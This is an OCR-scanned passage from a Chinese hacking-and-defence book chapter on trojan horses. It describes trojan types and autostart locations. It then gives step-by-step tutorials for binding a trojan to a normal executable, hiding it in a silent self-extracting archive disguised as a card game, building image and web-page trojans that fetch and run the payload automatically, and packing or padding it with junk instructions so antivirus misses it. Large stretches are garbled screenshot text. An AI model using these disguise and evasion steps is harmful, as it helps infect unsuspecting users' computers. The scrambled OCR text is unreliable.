通信 软件 的 登录 账号 和 密码 ， 工 作 原 理 和 
网 络 游戏 木马 类 似 ， 木 马 制作 者 盗 得 他 人 


账号 后 ， 可 以 偷窥 聊天 记录 等 隐私 内 容 。 


4. 破坏 性 木马 


顾名思义 ， 和 破坏 性 木马 唯一 的 功能 就 
是 破坏 感染 木马 的 计算 机 文件 系统 ， 使 其 遭 
受 系统 崩溃 或 者 重要 数据 丢失 的 巨大 损失 。 


5. 代理 木马 


代理 木马 最 重要 的 任务 是 给 被 控制 的 
“肉鸡 ”种 上 代理 木马 ， 让 其 变 成 攻击 者 
发 动 攻击 的 跳板 。 通 过 这 类 木马 ， 攻 击 者 
可 在 匿名 情况 下 使 用 Telnet、ICO、IRC 等 程 
序 ， 从 而 在 入 侵 的 同时 隐蔽 自己 的 踪迹 ， 
谨防 别人 发 现 自己 的 身份 。 


6. FTP 木 马 


FTP 木 马 的 唯一 功能 就 是 打开 21 端 口 并 
等 待 用 户 连接 ， 新 FTP 木 马 还 加 上 了 密码 功 
能 ， 这 样 只 有 攻击 者 本 人 才 知 道 正 确 的 密 
码 ， 从 而 进入 对 方 的 计算 机 。 


7. 反弹 端口 型 木马 


反弹 端口 型 木马 的 服务 端 ( 被 控制 
端 ) 使 用 主动 端口 ， 客 户 端 (控制 端 使 
用 被 动 端口 ， 正 好 与 一 般 木 马 相反 。 木 马 定 
时 监测 控制 端的 存在 ， 发 现 控 制 端 上 线 立即 
弹出 ， 主 动 连接 控制 端 打 开 的 主动 端口 。 


4.1.2 木马 常用 的 入 侵 方法 


木马 程序 千变万化 ， 但 大 多 数 木马 
程序 并 没有 特别 的 功能 ， 入 侵 方法 大 致 相 
同 。 常 见 的 入 侵 方法 有 以 下 几 种 。 


1. 在 Win.ini 文 件 中 加 载 


Win.ini 文 件 位 于 C:\Windows 目录 下 ， 
在 文件 的 [windows] 段 中 有 启动 命令 run= 和 
load=， 一 般 此 两 项 为 室 ， 如 果 等 号 后 面 存 
在 程序 名 ， 则 可 能 就 是 木马 程序 ， 应 特别 
当心 ， 这 时 可 根据 其 提供 的 源 文件 路 径 和 
功能 做 进一步 检查 。 
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这 两 项 分 别 是 用 来 当 系统 启动 时 自动 
运行 和 加 载 程序 的 ， 如 果木 马 程序 加 载 到 
这 两 个 子 项 中 ， 系 统 启动 后 即 可 自动 运行 
或 加 载 木马 程序 。 这 两 项 是 木马 经 常 攻击 的 
方向 ， 一 旦 攻击 成 功 ， 则 还 会 在 现 有 加 载 的 
程序 文件 名 之 后 再 加 一 个 自己 的 文件 名 或 参 
数 ， 这 个 文件 名 也 往往 是 常见 文件 的 ， 如 借 
command.exe、 sys.com 等 文件 来 伪装 o 


2. 在 System.ini 文 件 中 加 载 


System.ini 位 于 C:\Windows 目录 下 ， 其 
[boot] 字 段 的 shell=Explorer.exe 是 木马 喜欢 
的 隐藏 加 载 地 方 。 如 果 shell=Explorer.exe 
file.exe， 则 file.exe 就 是 木马 服务 端 程序 。 

另外 ， 在 System.ini 中 的 [386Enh] 字 段 
中 ， 要 注意 检查 字段 内 的 driver 二 路 径 \ 程 序 
名 也 有 可 能 被 木马 所 利用 。 再 有 就 是 Sys- 
tem.ini 中 的 “mic” “drivers” “drivers32” 
这 3 个 字段 ， 也 是 起 加 载 驱动 程序 的 作用 ， 
但 也 是 增添 木马 程序 的 好 场所 。 


3. 隐藏 在 启动 组 中 


有 时 木马 并 不 在 乎 自己 的 行踪 ， 而 
在 意 是 否 可 以 自动 加 载 到 系统 中 。 启 动 组 
无 疑 是 自动 加 载运 行 木马 的 好 场所 ， 其 
对 应 文件 夹 为 C:\Windows\startmenu\pro- 
grams\startup 。 在 注册 表 中 的 位 置 是 : 
HKEY _ CURRENT_USER\Software\Micro- 
soft\Windows\Current Version\Exploren\shell 
Folders Startup="c:\Windows\start menu\pro- 
grams\startup"， 要 检查 启动 组 。 


4. 加 载 到 注册 表 中 


由 于 注册 表 比 较 复 杂 ， 所 以 很 多 木马 
都 喜欢 隐藏 在 这 里 。 木 马 一 般 会 利用 注册 
表 中 下 面 的 几 个 子 项 来 加 载 。 

HKEY LOCAL MACHINE\Soft- 
ware\Microsoft\Windows\CurrentVersion\Run- 
ServersOnce; 

HKEY LOCAL MACHINE\Software\Mi- 
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crosoft\Windows\CurrentVersionN\Run:; 

HKEY _ LOCAL MACHINE\Soft- 
ware\Microsoft\Windows\CurrentVer- 
sion\RunOnce; 

HKEY CURRENT USER\Software\Mi- 
crosoft\Windows\CurrentVersion\Run; 

HKEY _ CURRENT USER\Software\Mi- 
crosoft\Windows\CurrentVersion\RunOnce; 

HKEY CURRENT USER\Software\Mi- 
crosoft\Windows\CurrentVersion\RunServers。 


5. 修改 文件 关联 


修改 文件 关联 也 是 木马 常用 的 入 侵 手 
段 ， 当 用 户 一 旦 打开 已 修改 文件 关联 的 文 
件 后 ， 木 马 也 随 之 被 启动 ， 如 冰河 木马 就 
是 利用 文本 文件 〈.txt) 这 类 最 常见 但 又 最 
不 引 人 注 目的 文件 格式 关联 来 加 载 自 己 ， 
当中 了 该 木马 的 用 户 打开 文本 文件 时 就 自 
动 加 载 了 冰河 木马 。 


6. 设置 在 超 链接 中 


这 种 入 侵 方法 主要 是 在 网 页 中 放置 恶 
意 代 码 来 引诱 用 户 点 击 ， 一 旦 用 户 单 击 超 
链接 ， 就 会 感染 木马 ， 因 此 ， 不 要 随便 单 
击 网 页 中 的 链接 。 


4.2 ”木马 常用 的 伪装 手段 


由 于 木马 的 危害 性 比较 大 ， 所 以 很 多 
用 户 对 木马 也 有 了 初步 的 了 解 ， 这 在 一 定 
程度 上 阻碍 了 木马 的 传播 。 这 是 运用 木马 
进行 攻击 的 黑客 所 不 愿意 看 到 的 。 因 此 ， 
黑客 们 往往 会 使 用 多 种 方法 来 伪装 木马 ， 
迷惑 用 户 的 眼睛 ， 从 而 达到 欺骗 用 户 的 目 
的 。 木 马 常用 的 伪装 手段 很 多 ， 如 伪装 成 
可 执行 文件 、 网 页 、 图 片 或 电子 书 等 。 


伪装 成 可 执行 文件 
利用 EXE 捆 绑 机 可 以 将 木马 与 正常 的 
可 执行 文件 捆绑 在 一 起 ， 从 而 使 木马 伪装 
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成 可 执行 文件 ， 运 行 捆绑 后 的 文件 相当 于 
同时 运行 了 两 个 文件 。 将 木马 伪装 成 可 执 
行文 件 的 具体 操作 步骤 如 下 。 

[step 国 下 载 并 解压 缩 EXE 捆 绑 机 ， 双 击 其 中 
的 可 执行 文件 ， 打 开 “EXE 捆 绑 机 8.3 版 ” 
主 界面 。 


EX 所 x 


BE 管 一 个 可 志和 六 约 


读 基 半 一 个 可 扩 和 文 件 这 是 革 一 个 文件 ,提亲 克文 从 与 它 一 标 ,看 不 出 交 人 


个 相 抽打 9 和 力 ; 
r 


过 时 白 守 壬 一 人 可 欣 行 件 


要 入 ， 测 E 下 - 坊 。 


[Few] ws | 
单 击 “ 点 击 这 里 指定 第 一 个 可 执行 文 
件 ” 按 钮 ， 打 开 “ 请 指定 第 一 个 可 执行 文件 ” 
对 话 框 ， 在 其 中 选择 第 一 个 可 执行 文件 。 


二 1 


2 Cee) = 


step 图 单 二 “打开 ”按钮 ， 返回 到 “指定 第 
一 个 可 执行 文件 ”对 话 框 。 


E03 x 


了 证 笋 一 人 可 奖 交 二 


二 各 一 个 可 区 亲人 ， 过 旦 所 一个 和 条 文件， 短文 生 与 它 一行 ,要 不 出 亚 人 


基本 由 行人 的 沽 GE 


TasanEangVN 下 全 ce 
人 可 的 入 件 


要 下- 光 。 


0 | 现 


第 二 个 可 执行 文件 ”对 话 框 。 


XE 机 83 版 


暑 定 第 一 仆 可 软文 余 


请 区 定 答 二 个 可 护 行 文 析 这 旺 筑 一个 所 多 文 件 , 用 闻 后 的 文件 构 看 不 到 它 提存 在. 


徐 二 个 可 起 行 的 路 区 为 


要 疙 ,汪汪 "下 一 步 "， 


Estee 加 单 击 “ 下 一 步 ” 按 钮 ， 打开“ 指定 


< 上 -Bl | F—#N) > 到 


木马 文件 。 


二 二 代 一 个 可 并 六 人 


个 了 


step 较 单 击 “打开 ”按钮 ， 返回 到 “指定 


第 二 个 可 执行 文件 ”对 话 框 。 


XE 机 63 版 


于 定 竺 二 仆 可 所 和 这 伯 | 


请 并 定 等 二 个 可 执行 文 析 ,这 旺 筑 一 个 扫 间 文件 , 各 部 后 的 文件 愉 大 不 到 亡 的 让 在 - 


入 一 个 可 沁 行 文人 的 基 生 为 
[cv 


去 这 旦 撕 主 半 一 个 可 执行 立 件 


要 型 纺 ,清点 二 下“ 步 … 


< 上 -Bl | F#m > Bs 


step 国 单 直 “点击 这 里 指定 第 二 个 可 执行 
文件 ”按钮 ， 打 开 “ 请 指定 第 二 个 可 执行 
文件 ”对 话 框 ， 在 其 中 选择 已 经 制作 好 的 
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保存 路 径 ” 对 话 框 。 


step[ 单 击 “下 一 步 ” 按 钮 ， 打开 “指定 


EYRELE3 栈 


有时 二 全 六 E] 


主 和 定 查 半 所 的 文 嘻 保 于 到 大 于， 


Pith 


| 


要 多， 光 训 二 下 一步" 


Esm | em | wn | 


step 图 单 二 “点 击 这 里 指定 保存 路 径 ” 按 


钮 打开“ 保存 为 ”对 话 框 ， 在 “文件 
名 ”文本 框 中 输入 可 执行 文件 的 名 称 ， 并 


设置 文件 的 保存 类 型 。 


"Si mkunbong ， 
ED 


Eb i 
EL Ba 
vs 昼 
生体 Tks 
hs i BeBndeen 
CE 
i Wendowero (es 
= + DY 
= + 加 
一 + 
POERN G0 。< 

SET RR Ce) 


[E | 


step 图 单 去 “保存 ”按钮 ， 
文件 的 保存 路 径 。 


EXERRLE3 版 


即 可 指定 捆绑 后 


,请 上 = 二 下 -一步 


< 上 -#B) | 下 -IN > 了 
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[Be 单 二 “下 一 步 ”按钮 ， 打 开 “ 选 泽 版 
本 ”对 话 框 ， 在 “版 本 类 型 ”下 拉 列 表 中 
选择 “普通 版 ”选项 。 
脖 泽 版 本 ] 


二 二 关 型 ， 


由 于 某 些 原因 ,共通 版 -很 可 能 会 和 亲 雪 软件 全 闲 。 请 在 侈 月 前 ,先天 
河 美雪 软件 ， 


要 于 融 ,请 让 二 "下 一 步 "。 


< 上 -- 步 B) | FN > 


单 击 “ 下 一 步 ” 按 钮 ， 打 开 “ 捆 绑 文 
件 ” 对 话 框 ， 该 对 话 框 提示 用 户 开 始 捆绑 
第 一 个 可 执行 文件 与 第 二 个 可 执行 文件 。 


si | 


黑客 攻防 与 电脑 安全 从 新 手 到 高 手 ( 微 视频 + 火力 升级 版 ) 


本， 请 襄 去 -取消 "， 


4.2.2 ”伪装 成 自 解压 文件 


利用 WinRAR 的 压缩 功能 可 以 将 正常 
的 文件 与 木马 捆绑 在 一 起 ， 并 生成 自 解压 
文件 ， 一 旦 用 户 运 行 该 文件 ， 同 时 也 会 激 
活 木 马 文件 ， 这 也 是 木马 常用 的 伪装 手段 


|ExESatp 机 33 岳 X 


揪 文 件 ] 
开始 所 纤 箭 一 个 可 执行 文件 与 策 一 个 可 执行 文件 生成 所 和 后 的 文件 


启 二 这 里 开始 据 帮 文件 


要 退出 ， 请 吉 去 "取消 "。 


< 上 一 消 @) | ws 


[step 图 单 去 “点 击 这 里 开始 捆绑 文件 ” 按 
钮 ， 即 可 开始 进行 文件 的 捆绑 。 待 捆绑 
结束 后 ， 即 可 看 到 “捆绑 文件 成 功 ” 提 示 
框 。 单 击 “确定 ”按钮 ， 即 可 结束 文件 的 
捆绑 。 


侈 提示 :黑客 可 以 使 用 木马 捆绑 技术 将 一 
个 正常 的 可 执行 文件 和 木马 捆绑 在 一 起 。 
一 旦 用 户 运行 这 个 包含 木马 的 可 执行 文 
件 ， 就 可 以 通过 木马 控制 或 攻击 用 户 的 计 
算 机 。 
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之 一 。 将 木马 伪装 成 自 解压 文件 ， 具 体 的 
操作 步骤 如 下 。 
[step 轩 准备 好 要 捆绑 的 文件 ， 这 里 选择 的 是 
蜂 蛛 纸牌 .exe 和 木马 .exe 文 件 ， 并 存放 在 同 
一 个 文件 夹 下 。 


站 日 目 = | 二 x4 rs 


2 国 e 
[step 图 选中 览 蛛 纸牌 .exe 和 木马 .exe 文 件 所 
在 的 文件 夹 并 右键 ， 在 快捷 菜单 中 选择 
“添加 到 压缩 文件 ”选项 ， 随 即 打开 “ 压 
缩 文件 名 和 参数 ”对 话 框 。 


step 图 在 “压缩 文件 名 ”文本 框 中 输入 要 生 
成 的 压缩 文件 的 名 称 ， 并 匀 选 “创建 自 解 
压 格式 压缩 文件 ” 复 选 框 。 


压 纺 文件 名 (A) 测 昨 全- 
EE 可 
更 新 方式 (v) 
本 置 ) 添加 并 将 接 文 总 
压 编 文件 格式 压痛 选项 
加 ME 〇 MS 〇 zr 口 压 绵 所 时 原来 的 文件 (0) 
团 sl 自 衣 格式 压 纺 文 件 () 
A 口 大 突 纺 文件 G) 
标准 妆 。 口 测 路 复 记 录 (Z) 
字典 大 小 (I) 口 巴 E98 文件 (7) 
4096 到 司 。 口 铅 才 压 纺 文 件 作 
切 分 为 分 卷 (7)， 大 小 
“| 设 二 


[st 图 选择 “高 级 ”选项 卡 ， 在 其 中 分 别 勾 


选 “ 保 存 文件 安全 数据 ” 


“保存 文件 流 数 


据 ” “后 台 压 缩 ” “完成 操作 后 关闭 计算 
机 电源 ”“ 如 果 其 他 WinRAR 副 本 被 激活 则 
等 待 ” 复 选 框 。 
时 下 文件 全 和 参数 7 x 
第 规 ”高 豚 。 远 硕 文件 ”备份 时间 。 注释 
Ts 选 需 恢复 记录 (8) 
加 保存 文 件 安全 数据 (S) 3 隐 
回 保存 文件 流 娄 据 (T) 
村 符号 链 格 保存 为 匀 接 (L) 
将 硬 梯 接 保存 为 树 接 (0 
分 
每 个 分 守 扣 作 完 之 后 知 集 (Y) ER 
旧 风 榕 分 卷 和 名 (L) 自 解 压 选 项 (x) 
系统 
回 后 省 压缩) 
回 完成 操作 后 关闭 计算 机 电源 (P) 
回 如 果 其 它 由 afAR 副本 被 烽 风 等 竺 (7) 
末 | 酌 


“高 级 自 解 压 选项 ” 


[ee 图 单 去 “ 自 解压 选项 ”按钮 ， 即 可 打开 


对 话 框 ， 在 “解压 路 


径 ” 文 本 框 中 输入 解压 路 径 ， 并 选中 “在 
当前 文件 夹 中 创建 ” 单 选 按钮 。 
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LE 1 文 
文本 和 可 标 许可 楼 
ed 3 模式 言 级 更 新 
前 王政 


加 


口 在 “Prosran Files” 中 他 是 们 ) 
@ 在 当前 文件 关中 创建 {C) 


绝对 喧 征 (4) 


口 保存 并 恢复 器 径 信 ) 


ws 末 
[Eee 图 选择 “模式 ”选项 卡 ， 在 其 中 选中 
“全 部 隐藏 ” 单 选 按钮 ， 这 样 可 以 增加 木 
马 程序 的 隐藏 性 。 


天 和 B 邮 5 页 7 Xx 


文本 和 国标 许可 模块 
bd 设 本 机 二 B23 更 新 
人 式 

口 解 is8j 文 件 夫 (T) 

So) 

调 本 题 (GT) 

安稳 模式 

口 全 部 显示 (人 ) 


口 隐 攻 启动 对 话 框 G) 
国 全 部 了 车 00 


二 
为 了 更 好 地 迷惑 用 户 ， 还 可 以 在 “ 文 
本 和 图 标 ” 选 项 卡 下 设置 自 解压 文件 窗口 
标题 、 自 解压 文件 图 标 等 。 


瑟 天 和 可 于 页 x 


自 衣 文件 二 口 本 题 (7 
EE 


自 交 下 文件 宣 口中 显示 的 文本 多) 
EE] 


[ 
从 文件 如 载 文 本 [L) 
自 定 义 自 解 甘 文件 党 标 和 图 标 
从 文件 加 载 自 第 压 党 标 名) 


从 文件 加 载 自 第 压 文件 图 标 {T) 


i 
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[step 罗 设置 完毕 后 ， 单 击 “ 确 定 ” 按 钮 ， 
返回 “压缩 文件 名 和 参数 ”对 话 框 。 在 
“注释 ”选项 卡 中 可 以 看 到 自己 所 设置 的 
各 项 。 


恬 下 G 文 件 各 和 多 数 和 


常规 。 高级。 选项 文件 备份” 时间 。 注 笃 
从 文件 中 加 载 注释 如) Ms) 


手动 输入 注释 内 容 (C) 
;下 面 的 注释 包含 自 解压 脚本 命令 


Silent=l 
Title- 搬 蛛 纸牌 
Text 


和 ae 


[step 图 单 去 “确定 ”按钮 ， 即 可 生成 一 个 名 
为 “蜘蛛 纸牌 ” 自 解压 的 压缩 文件 。 这 样 


用 户 一 旦 运行 该 文件 后 就 会 中 木马 。 

和 | 前 晶 : | windows10 [c) 让 于 人 本 工具 - D x 
主页。 # 享 ”二 要 人 久 理 @ 
所 “个 加， 此 电 .，Win.. ， v | 搜索 "Windows1. 局 

网 各 条 和 
区 快速 沪 问 
本 sse eve 
全 OneDrive pe 
国 此 电脑 回 daimabat 
a Pe 
po x 
国 7 国 Program Files 
BD programData 
小 至 乐 © Windows 
加 机 目 Revein 
包 Windowsl0 (C) 电 。 则 DRMSoft 2 
18 个 项 目 。 选中 1 个 项 目 612 KB 图 眉 


4.2.3 ”将 木马 伪装 成 图 片 


训 蚁 读 将 木马 伪装 成 图 片 是 许多 木马 制作 者 
常用 来 骗 对 方 执行 木马 程序 的 方法 ， 例 如 
将 木马 伪装 成 GIF、JPG 等 ， 这 种 方式 可 以 
“使 很 多 人 中 招 。 用 户 可 以 使 用 “图 片 木 马 
洽 扫 生成 器 ”工具 将 木马 伪装 成 图 片 ， 具 体 的 
信守 操作 步 又 如 下 。 
[Bes 图 下 载 并 运行 “图 片 木马 生成 器 ”程序 ， 
打开 “ 寻 梦 图 片 木马 生成 器 V1.0” 主 窗口 。 
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[Sep 加 在 “网 页 木马 地 址 ”文本 框 和 “真实 
图 片 地 址 ”文本 框 中 分 别 输入 网 页 木马 和 
真实 图 片 地 址 ; 在 “选择 图 片 格式 ”下 拉 
列表 中 选择 “jpg” 选 项 。 


入 寻 梦 型 片 木马 生成 器 V10 


[step 图 单 去 “生成 ”按钮 ， 随 即 弹出 “ 图 
片 木 马 生成 完毕 ”提示 框 ， 单 击 “ 确 定 
按钮 ， 关 闭 该 提示 框 ， 这 样 只 要 打开 该 图 
片 ， 就 可 以 自动 把 该 地 址 的 木马 下 载 到 本 
地 并 运行 。 


4.2.4 ”将 木马 伪装 成 网 页 

网 页 木马 实际 上 是 一 个 HTML 网 页 ， 
与 其 他 网 页 不 同 ， 该 网 页 是 黑客 精心 制作 
的 ， 用 户 一 旦 访问 了 该 网 页 就 会 中 木马 。 


下 面 以 “最 新 网 页 木马 生成 器 ”为 例 介绍 
制作 网 页 木马 的 过 程 。 


侈 提示 :在 制作 网 页 木马 之 前 ， 必 须 有 一 
个 木马 服务 器 端 程序 ， 在 这 里 使 用 生成 木 
马 程序 文件 名 为 “muma.exe”。 


step 罗 | 运行 “最 新 网 页 木马 生成 器 ” 主 程序 
后 ， 即 可 打开 其 主 界面 。 


园 最 新 网 页 木马 生成 器 Sp2 ww 
选择 木马 测量 
目录 [Fttp /fw Xiechaani con/ 
生成 目录 : 下 浏览 

诉 明 


Me 


[step 图 单 南 “ 选 择 木马 ”文本 框 右 侧 “ 浏 

览 ” 按 钮 ， 打 开 “ 另 存 为 ”对 话 框 ， 在 其 

中 选择 刚才 准备 的 木马 文件 “木马 .exe”。 
网 号 有 为 x 
i ES 


HE(N: [en 


保守 
mmm: | 可 5xree | i 


单 击 “ 保 存 ” 按 钮 ， 返回 到 “最 新 
网 页 木马 生成 器 sp2” 主 界面 。 在 “网 页 目 
录 ” 文 本 框 中 输入 相应 的 网 址 ， 如 http:// 


www.index.comy/。 


园 是 新 网 页 木马 生成 器 SP2 本 
选择 森马 。 5 避 生 文 作 天 林 配 测 
目录 区 ww Te on] 

生 万 目录 
生成 


说明 
NW 


itp: /ene xiaochuasd oom 
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step 图 单 击 “生成 目录 ”文本 框 右 侧 “ 浏 
览 ” 按 钮 打开“ 浏览 文件 夹 ” 对 话 框 ， 
在 其 中 选择 生成 目录 保存 的 位 置 。 


内 DG492371_x86 
由 ExcelKey-v91 v 


Ee 图 单 二 “确定 ”按钮 ， 返 回 到 “最 新 网 
页 木马 生成 器 sp2” 主 界面 。 


| 最 新 网 页 木马 生成 用 SP2 x 
选择 木马 。 -关于 文件 夫 \ 厅 可 ex 3 
网 页 目录 [http ww inderx oon/ 
生成 目录 :IE V7 20vaneye 测 览 


生成 


i 


[Sep 图 单 去 “生成 ”按钮 ， 会 弹出 一 个 信息 提 
示 框 ， 提 示 用 户 “网 页 木马 创建 成 功 ! ”， 

单 击 “确定 ”按钮 ， 即 可 成 功 生 成 网 页 
木马 。 


提示 x 


06 网 页 木马 创建 成 功 1 


[step 园 在 “7.20wangye” 文 件 夹 中 将 生成 
bbs003302.css、bbs003302.gif 及 index.htm 3 
个 网 页 木马 。 其 中 index.htm 是 网 站 的 首页 
文件 ， 而 另外 两 个 是 调用 文件 。 
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加 | 回 卓 > | 720wangye = 口 X 
页 # 训 ”二 © 
€ 个 目 < 本 地 v 总。 得 过 "720wangye 
1 宇 称 

由 7.20wangye 

bbs003302.css 
同 bbs003302.gif 
5) indexhtm 


国 点 百 


生 Windows10 (C3 局 二 g 


4 个 项 目 。 玩 中 1 个 项 目 967 字 节 国电 


Estee 图 将 生成 的 3 个 木马 上 传 到 前 面 设 置 的 
存在 木马 的 Web 文 件 夹 中 ， 当 浏览 者 一 旦 打 
开 这 个 网 页 ， 浏览 器 就 会 自动 在 后 台 下 载 
指定 的 木马 程序 并 开始 运行 。 

斧 提 示 : 在 设置 存放 木马 的 Web 文 件 夹 
路 径 时 ， 设 置 的 路 径 必须 是 某 个 可 访问 的 
文件 夹 ， 一 般 位 于 自己 申请 的 一 个 免费 网 
站 上 。 


4.3 木马 的 自我 保护 


在 杀毒 软件 越 来 越 强 的 情况 下 ， 木 马 
不 但 要 具有 更 强 的 功能 ， 还 要 具有 自我 保 
护 的 功能 。 目 前 ， 大 部 分 杀毒 软件 是 靠 特 
征 码 来 识别 木马 的 ， 因 此 ， 可 以 通过 使 用 
加 壳 工 具 来 更 改 木 马 的 特征 码 ， 以 躲 过 杀 
毒 软件 的 查 杀 。 


4.3.1 ”给 木马 加 过 


通过 给 木马 加 壳 ， 可 以 将 木马 保护 起 
来 ， 不 过 一 些 特别 强 的 杀毒 软件 仍然 可 以 
查 杀 出 这 些 木 马 ， 因 此 ， 只 有 进行 多 次 加 
壳 才 能 保证 不 被 杀毒 软件 查 杀 。《 北 斗 程 
序 压 缩 (NsPack)》 就 是 一 款 可 以 为 木马 
进行 多 次 加 壳 的 工具 ， 其 具体 的 操作 步 
又 如 下 。 

[step 图 用 常见 的 加 过 工具 ASPack 给 某 个 木 
马 服务 端 进行 加 过 ， 然 后 运行 《北斗 程序 
压缩 》 软 件 ， 打 开 其 主 窗口 。 
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黑客 攻防 与 电脑 安全 从 新 手 到 高 手 〈 微 视频 + 火力 升级 版 ) 


文才 四 选项 @) 。 。 天助 如 版 本 3.7 
如 文本 多 | 闻 目录 压缩 | 员 配置 选 太 | 丽 。 关 于 | 
Be 2 

0% 
时 OO 遇 进出 四 打开 四 ) 


[E55 国 选择 “配置 选项 ”选项 卡 ， 在 其 中 勾 


选 相 应 参数 前 的 复 选 框 。 
文件 四 选项 GE) 帮助 0 版 本 3.7 
如 文人 压强 | 六 好 压 奖 种 本 轩 兴 了 | 天 于 | 
所 压 六 资源 打 智 路 重 定位 节 
捷 在 压 端 前 备份 程 序 厂 保留 额外 数据 
太 强制 压 负 友 退出 保存 设置 
厂 处 理 共享 节 厂 使 用 Shel1 右 键 扩展 
厂 加 可 后 自动 运行 厂 更 新 aos stub 部 分 
克 使 用 Windors DLL 加 吉 路 厂 最 大 程度 压缩 ringx: 不 必 持 ) 
厂 保留 原文 忻 的 大 小 厂 莱 宫 性 压 区 
节 和 名称 : 
名 用 户 指定 节 名 小 于 6 个 字符 ); [np [清除 所 有 节 名 
〇 使 用 随机 数 命名 (D000000-9999999) 语言 [# 文 “可 
晤 器 退 o 人 


其 中 有 几 个 比较 重要 的 参数 ， 具 体 含 
义 如 下 。 

@ 处 理 共享 节 : 加 壳 时 软件 会 智能 地 
判断 共享 节 的 可 用 性 并 做 出 正确 处 理 ， 使 
木马 程序 在 压缩 后 能 够 正常 使 用 ， 此 项 是 
必 选 的 。 

@ 使 用 Windows DLL 加 载 器 : 让 Win- 
dows 自 动 进行 处 理 。 

@ 最 大 程度 压缩 : 压缩 加 壳 生 成 后 的 
程序 ， 使 其 容量 达到 最 小 。 

[step 图 选择 “文件 压缩 ”选项 卡 ， 单 击 “ 打 
开 ” 按 钮 ， 即 可 打开 “版 本 3.7” 对 话 框 ， 
在 其 中 选择 一 个 可 执行 文件 。 


step 辆 单 去 “打开 ”按钮 ， 返 回 到 “文件 压 
缩 ” 选 项 卡 ， 在 空白 窗 格 上 面 会 显示 出 要 
加 这 文件 的 路 径 和 名 称 。 
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Eee 图 单 直 “压缩 ”按钮 ， 即 可 开始 文件 
的 压缩 。 经 过 北斗 程序 压缩 加 过 的 木马 程 
序 ， 可 以 使 用 ASPack 等 加 上 这 工具 进行 再 次 
加 过 ， 这 样 就 有 了 两 层 壳 的 保护 。 

[ET | 


局 上 37 x 可 
个 轩 = windows1-， 新 娃 文 伯 夫 ~ Dp 文件 四 这 项 上 者 助 中 版 本 3.7 
息 纪 ~。 新疆 六 件 夫 -me 罗 立 装 营 冲 目录 压 第 | 剧本 雪 生 世 | 执 关于 | 
pr i pr 者 E 纺 有 好 
ty be E33 | 
国 更 机 mumaexe seo 
Es Ml terete exe 525 
自 划 
全 
小 齐 乐 
图 sm 
过 Windows10 (C: 
= Ie (D) 
= He 
人 厂 包子 有 录 F 合用 格 二 过 湖 器 be 轴 于 
DE) 、《 0% 
EN [muma ere ~ PEFles Corerdlon 癌症 a 
加 
站 « » Ca 
HB [step 加 单 去 “打开 ”按钮 ， 即 可 打开 “浏览 
文件 (0) 选 顺 (8) 才 助 (0) 版 本 3.7 > » > » 
文件 夹 ” 对 话 框 选择 需要 压缩 的 
如 文件 区 | 前 目 录 所 | 司职 和 过 | 执 。 关 于 | . 件 和 ， 在 其 中 选择 需要 
| ne 文件 夹 。 
RE 广 # 关 x 
二 
v Windows10 (C) ~ 
Autodesk 
目 data 
旺 DRMSoft 
intel 
由 N-Stalker 
闻 perftogs 
| 4 目 program Files 
出 programData 
Em 机 退 dt) 打开 他) 是 keven 
上 a 


单 击 “ 确 定 ” 按 钮 ， 返回 到 “目录 压 
缩 ” 选 项 卡 下 ， 即 可 看 到 添加 的 文件 及 其 


文才 由。 过 项 。。 圳 屿 0 碑 本 3.7 子 目 录 ， 分 别名 选 “ 和 包含 子 目 录 ” 复 选 框 
如 文人 过 | 月 录 压 各 | 后 配置 过 区 | 归于 | i 和 
| 区 和 “使 用 格式 过 滤器 ” 复 选 框 。 
校 验 PE 格 式 下 E32) . 
三 节 娄 目 ED 
六 0001000 本 37 
aw et 册立 件 太 前 目录 压缩 | 山村 和 轨 法 苹 | 执 关于 | 
l 00001000 @) 
文件 对 充 广 式 200 Bh) 这 二 8 文人 站 
电站 直人 [EE ST HE | Wh | ER 
旺 和 人 me 15 
正在 讨 加 和 ae 2s 
9 人 4i4 0) 于 过 :ts. 49] L me Me 
文件 庄 编 守 本 局 me ee 
qT E 司 
PY 
和 站 ee 打包 人 子 上 录 信用 格 友 过 活 器 哺 局 和 
a 时 要 
0% 
[Eee 园 当 需 要 一 次 性 对 大 量 的 木马 程序 进行 。 | 3 aso neo ee 
压缩 加 计时， 可 以 使 用 “北斗 程序 压缩 ” 


的 “目录 压缩 ”功能 ， 选 择 “ 目 录 压 缩 ” 
选项 卡 ， 进 入 “目录 压缩 ”设置 界面 。 


step 图 单 击 “压缩 ”按钮 ， 即 可 开始 对 选中 
的 程序 进行 批量 压缩 加 壳 。 


bo 


文人 由。 沽 名 和 惠 动 四 版 本 37 
_ 妇 文正 纺 六 日 好 党 | 帅 配 要 过 | 二 关于 | 


于 大 二 疾风 导语 -0 已 讨 绽 0 


E 


回 | 
BE 
ED 
ED 
四 国 


末 包 当 于 上 录 合用 从 二 过 六 强 加 5 

LI | 

和 畏 虽 用 id 四 9 开 四 
给 木马 加 花 指令 


4.3.2 


a ” 花 指 令 是 一 段 没 有 具体 意义 、 不 影响 
程序 正常 运行 的 代码 ， 其 主要 作用 是 加 大 
杀毒 软件 查 杀 病毒 的 难度 。 利 用 《超级 加 
花 器 》 工 具 可 以 为 木马 程序 加 花 指 令 ， 该 
se 四 工具 是 一 款 典 型 的 加 花 指 令 工 具 ， 支 持 附 
加 数据 自动 检测 ， 对 于 某 些 存在 附加 数据 
密 的 EXE、DLL 等 程序 加 花 后 仍 可 执行 
使 用 《超级 加 花 器 》 为 木马 程序 加 花 
ha ti 
[sep 国 运行 《起 级 加 花 器 》 工 具 ， 即 可 打开 
其 主 窗 口 。 可 以 将 要 加 花 指 令 的 程序 直接 
拖 动 到 “文件 名 ”文本 框 中 并 释放 鼠标 
再 在 “ 花 指 令 ” 下 拉 列 表 中 选择 相应 的 花 


指令 。 
刚 超级 jn 器 v1.4 build 20061207 ”一 x 
文件 各: 牧 马 东 民 成 员 专 用 软件 ! 
CMHR we | 
花 指 人 附加 未 据 大 小 : 12736 字 节 
[ER v 
配置 选 而 
回 创 建 备份 随机 区 段 名 随机 
回 保 久 附 加 孝 据 最 小 区 段 大 最 
加 弦 人 | | 更 新 0) | | 着 内 | | 开罗 
添加 伦 指 人 
花 指 人 名 称 : 保存 G) 
花 指 人 内容 : 人 
注意 ; 1 花 指 人 的 名 称 可 以 是 中 文 或 者 欧文 
2 指令 内 容 必须 是 连 综 16 进 制 码 ， 不 能 有 空格 ; 
3 花 指 人 内 容 大 小 应 小 于 255 字 节 。 
准备 .，。 〖 牧 马 游民 〗 http://mumaba.com/wiaohui/_xiaohui 


[step 图 单 去 “加 花 ” 按 钮 ， 就 可 以 为 选择 
